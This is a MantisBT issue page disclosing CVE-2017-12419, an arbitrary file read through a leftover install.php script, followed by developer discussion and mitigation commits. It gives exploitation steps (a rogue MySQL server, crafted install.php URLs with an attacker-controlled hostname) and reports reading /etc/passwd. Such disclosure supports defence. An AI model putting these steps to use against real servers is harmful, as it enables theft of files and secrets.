View Issue Details

IDProjectCategoryView StatusLast Update
0023173mantisbtinstallationpublic2017-08-04 19:35
ReporteriamsecurityAssigned To 
PrioritynormalSeveritycrashReproducibilityalways
Status confirmedResolutionopen 
Product Version 
Target VersionFixed in Version 
Summary0023173: CVE-2017-12419: Arbitrary File Read inside install.php script
Description

After successful installation of bug tracker, it doesn't remove install.php script because of that attacker can read any file on the remote system through some installation process steps.
The problem is complex and exists inside MySQL server and PHP to MySQL drivers. You can read full details about it in my blog article — http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

Steps To Reproduce

For successful exploitation, you need run special rogue MySQL server and connect to it from a server where you want to read files. Unfortunately, Mantis allow that.
You can find server at my repository — https://github.com/allyshka/Rogue-MySql-Server/blob/master/roguemysql.php

An attacker can go to any step of an installation process.
See at this part of code:

/admin/install.php:

86: # install_state
87: #   0 = no checks done
88: #   1 = server ok, get database information
89: #   2 = check the database information
90: #   3 = install the database
...
95: $t_install_state = gpc_get_int( 'install', 0 );

If you browse to the URL https://mantisbt/admin/install.php?install=3 then you go to the install the database section. Where you can find that part of code.

/admin/install.php:

745: # all checks have passed, install the database
746: if( 3 == $t_install_state ) {
...
765:    <?php
766:        $t_result = @$g_db->Connect( $f_hostname, $f_admin_username, $f_admin_password, $f_database_name );
767: 
768:        $t_db_open = false;

Script try to connect to MySQL server, but you can control $f_hostname variable through HTTP-request parameter hostname.

admin\install.php:

200:    $f_hostname           = gpc_get( 'hostname', config_get( 'hostname', 'localhost' ) );

https://mantis/admin/install.php?install=3&hostname=127.0.0.1
For testing purposes, I'm trying to read /etc/passw:

Additional Information

This issue potentially affects ALL MantisBT versions running on MySQL / MariaDB, unless they have disabled local_infile

TagsNo tags attached.

Relationships

related to 0023179 resolveddregad Login page no longer warns about 'admin' directory being present 
parent of 0023185 resolveddregad Improve doc and notifications when admin dir is present (CVE-2017-12419) 

Activities

iamsecurity

iamsecurity

2017-08-01 00:46

reporter  

etc-passwd-read.jpg (204,126 bytes)
etc-passwd-read.jpg (204,126 bytes)
dregad

dregad

2017-08-01 06:30

developer   ~0057370

Last edited: 2017-08-01 06:30

View 2 revisions

Thanks for your report.

As per documentation, after installation the administrator is expected to delete the admin/ directory:

2. Delete the admin folder
For security reasons, the scripts within this directory should not be accessible on a 
live MantisBT site or on any installation that is accessible via the Internet.
Once you have confirmed that the install/upgrade was successful, you should delete this directory 

It would also be the admin's responsibility to prevent local file lookup in their MySQL setup (see MySQL documentation)

I'm not sure if or how we can actually prevent such attack from MantisBT code though. If you have any ideas please let me know.

dregad

dregad

2017-08-03 18:40

developer   ~0057385

I can confirm the exploit, which just tested on my dev box.

Problem is, short of rewriting the whole installer to not rely on GPC parameters to control its state (which is not something I have the bandwidth for right now), I don't know how we could fix it.

As a stopgap measure, I'll improve the documentation, system checks and warnings to better advise administrators of the vulnerability and potential risk.

dregad

dregad

2017-08-03 19:27

developer   ~0057386

@iamsecurity, after a bit of research, I found that by setting mysqli.allow_local_infile = 0 in php.ini, the rogue server is no longer able to retrieve local files. Can you please confirm ?

dregad

dregad

2017-08-04 03:30

developer   ~0057388

MITRE assigned CVE-2017-12419 to this issue [scr370826]

iamsecurity

iamsecurity

2017-08-04 04:32

reporter   ~0057390

@dregad I'll check your fix and it's working for mysqli driver. Thaks for research. There is PDO drivers have disabled LOAD LOCAL by default.

Documentation has good security recommendations about delete admin folder but in my practice, I find many Mantis installations with admin folder exists.
I think about some install.lock file and if exists then install.php script will not work.

dregad

dregad

2017-08-04 05:38

developer   ~0057391

Thanks for your feedback.

in my practice, I find many Mantis installations with admin folder exists

That's true unfortunately; but we can only do so much and system administrators also need to take their responsibilities at some point.

It's worth mentioning that a warning about existence of admin directory used to be shown on login page in older versions of Mantis, but it was removed probably by mistake in 1.3.0 (see 0023179); this will be fixed in the next release, and should encourage administrators to do something about it.

I think about some install.lock file and if exists then install.php script will not work.

That's an interesting approach. Problem is that we may not have write access to the file system, in which case the file would have to be created by the admin so back to square one.
Anyway I'll keep that in mind and discuss the idea with other dev's, we'll see how we could implement it.

dregad

dregad

2017-08-04 18:57

developer   ~0057394

I just pushed several commits to improve the documentation and notifications to administrators about the presence of the admin directory, which hopefully increase awareness about the issue and thus lower the risk of people being vulnerable without knowing it.

I will leave this issue open, since it is not fixed from a Mantis perspective (we rely on user action to protect themselves).

Related Changesets

MantisBT: master-2.5 d6d7dc2d

2017-08-03 16:54:04

dregad

Details Diff
Restore "admin dir" warning on login page

Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin
checks on login page to remove the logic checking for pre 1.0 upgrade
steps.

However, it also (probably unintentionally) removed the check for admin
directory presence, so administrators are no longer reminded that they
should delete this directory, potentially leaving them exposed to
security breaches.

This commit restores the warning, and improves the error message.

Fixes 0023179
Stopgap measure for issue 0023173
mod - lang/strings_english.txt Diff File
mod - login_page.php Diff File

MantisBT: master-1.3.x 21a15b88

2017-08-03 16:54:04

dregad

Details Diff
Restore "admin dir" warning on login page

Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin
checks on login page to remove the logic checking for pre 1.0 upgrade
steps.

However, it also (probably unintentionally) removed the check for admin
directory presence, so administrators are no longer reminded that they
should delete this directory, potentially leaving them exposed to
security breaches.

This commit restores the warning, and improves the error message.

Fixes 0023179
Stopgap measure for issue 0023173

Backported from master-2.5 branch d6d7dc2dc7473637c8ac17a78c0374f16981f409
mod - lang/strings_english.txt Diff File
mod - login_page.php Diff File

MantisBT: master-2.5 3a7c6f75

2017-08-03 19:39:40

dregad

Details Diff
Improve admin information about CVE-2017-12419

- Add admin check for mysqli.allow_local_infile
- Add reminder to remove admin dir at end of Admin checks
- Improve post-install tasks section of Admin Guide: add explicit
warning about potential consequences of not deleting the admin
directory, more descriptive wording.

Stopgap measures for issue 0023173
mod - admin/check/check_database_inc.php Diff File
mod - admin/check/index.php Diff File
mod - docbook/Admin_Guide/en-US/Installation.xml Diff File

MantisBT: master-1.3.x 10211c90

2017-08-04 17:45:55

dregad

Details Diff
Improve admin information about CVE-2017-12419

- Add admin check for mysqli.allow_local_infile
- Add reminder to remove admin dir at end of Admin checks
- Improve post-install tasks section of Admin Guide: add explicit
warning about potential consequences of not deleting the admin
directory, more descriptive wording.

Stopgap measures for issue 0023173

Backported from master-2.5 branch 3a7c6f75bf3c4bc0856ebffe388df9e46ac10e5d

Conflicts:
admin/check/index.php
mod - admin/check/check_database_inc.php Diff File
mod - admin/check/index.php Diff File
mod - docbook/Admin_Guide/en-US/Installation.xml Diff File

Issue History

Date Modified Username Field Change
2017-08-01 00:46 iamsecurity New Issue
2017-08-01 00:46 iamsecurity File Added: etc-passwd-read.jpg
2017-08-01 06:30 dregad Assigned To => dregad
2017-08-01 06:30 dregad Status new => acknowledged
2017-08-01 06:30 dregad Note Added: 0057370
2017-08-01 06:30 dregad Note Edited: 0057370 View Revisions
2017-08-03 18:40 dregad Assigned To dregad =>
2017-08-03 18:40 dregad Status acknowledged => confirmed
2017-08-03 18:40 dregad Note Added: 0057385
2017-08-03 19:27 dregad Note Added: 0057386
2017-08-04 03:30 dregad Summary Arbitrary File Read inside install.php script => CVE-2017-12419: Arbitrary File Read inside install.php script
2017-08-04 03:30 dregad Note Added: 0057388
2017-08-04 04:32 iamsecurity Note Added: 0057390
2017-08-04 05:38 dregad Note Added: 0057391
2017-08-04 18:17 dregad Changeset attached => MantisBT master-2.5 d6d7dc2d
2017-08-04 18:17 dregad Changeset attached => MantisBT master-2.5 3a7c6f75
2017-08-04 18:17 dregad Changeset attached => MantisBT master-1.3.x 21a15b88
2017-08-04 18:17 dregad Changeset attached => MantisBT master-1.3.x 10211c90
2017-08-04 18:57 dregad Note Added: 0057394
2017-08-04 18:57 dregad View Status private => public
2017-08-04 18:59 dregad Product Version 2.5.1 =>
2017-08-04 18:59 dregad Steps to Reproduce Updated View Revisions
2017-08-04 18:59 dregad Additional Information Updated View Revisions
2017-08-04 19:00 dregad Relationship added related to 0023181
2017-08-04 19:00 dregad Relationship added related to 0023179
2017-08-04 19:00 dregad Relationship deleted related to 0023181
2017-08-04 19:24 dregad Relationship added parent of 0023185
2017-08-04 19:29 dregad Note View State: 0057390: public
2017-08-04 19:32 dregad Relationship replaced related to 0023185
2017-08-04 19:33 dregad Relationship deleted related to 0023185
2017-08-04 19:35 dregad Relationship added parent of 0023185